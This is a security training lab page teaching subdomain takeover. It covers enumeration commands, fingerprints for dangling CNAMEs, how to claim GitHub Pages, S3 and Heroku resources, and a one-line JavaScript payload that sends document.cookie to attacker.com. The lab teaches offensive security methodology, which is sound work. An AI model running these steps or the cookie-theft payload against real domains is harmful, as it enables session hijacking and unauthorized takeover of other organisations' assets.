๐ŸŽฏ Lab Objectives

  • Understand what makes a subdomain vulnerable to takeover
  • Enumerate subdomains at scale using automated tools
  • Identify dangling CNAME records pointing to unclaimed resources
  • Claim a vulnerable subdomain via a cloud service
  • Exploit a taken-over subdomain for cookie theft and CSP bypass
  • Automate subdomain takeover monitoring in a CI pipeline

Topics Covered

  • CNAME chain resolution and dangling records
  • Fingerprinting takeover-vulnerable services from HTTP responses
  • GitHub Pages subdomain takeover methodology
  • AWS S3 bucket subdomain takeover
  • Heroku/Fastly/Ghost takeovers
  • Cookie scope implications โ€” stealing session cookies via subdomain takeover

What is Subdomain Takeover?

When a company creates a DNS CNAME pointing blog.company.com to company.github.io and later removes the GitHub Pages site without removing the DNS record, an attacker can register company.github.io and serve arbitrary content from blog.company.com. Impact: cookie theft, phishing, CSP bypass, credential harvesting.

Enumeration

# Mass subdomain discovery
subfinder -d target.com -o subs.txt
amass enum -passive -d target.com | tee -a subs.txt
sort -u subs.txt > all_subs.txt

# DNS resolution and CNAME extraction
cat all_subs.txt | dnsx -cname -o cnames.txt

Identifying Dangling Records

# Manual check
dig CNAME blog.target.com
# If CNAME points to unclaimed resource: VULNERABLE

# Automated scanning
subjack -w all_subs.txt -t 100 -timeout 30 -o results.txt -ssl

# Nuclei takeover templates
nuclei -l all_subs.txt -t takeovers/

Fingerprinting Vulnerable Services

ServiceResponse FingerprintClaim Via
GitHub Pages"There isn't a GitHub Pages site here"Create repo with matching name
AWS S3"NoSuchBucket"Create S3 bucket with exact matching name
Heroku"No such app"Create Heroku app with matching name
Fastly"Fastly error: unknown domain"Create Fastly service
Ghost"Domain not configured"Register matching ghost.io subdomain

Exploitation Impact

# Steal domain-scoped cookies from the taken-over subdomain
document.location='https://attacker.com/steal?c='+document.cookie

# CSP bypass โ€” if CSP includes *.victim.com, a taken-over sub can host malicious scripts
# Same-site context โ€” your taken-over sub has same-site=lax for the parent domain
โœ…
Lab Complete! Mark it done below and continue your learning path.
โ† All Labs
// guided terminal

Try It Live

Type the commands from the steps above. The terminal simulates the expected output for this lab.

KaliRange ~ Terminal type help for commands
๐Ÿ“–
Sign in to track progress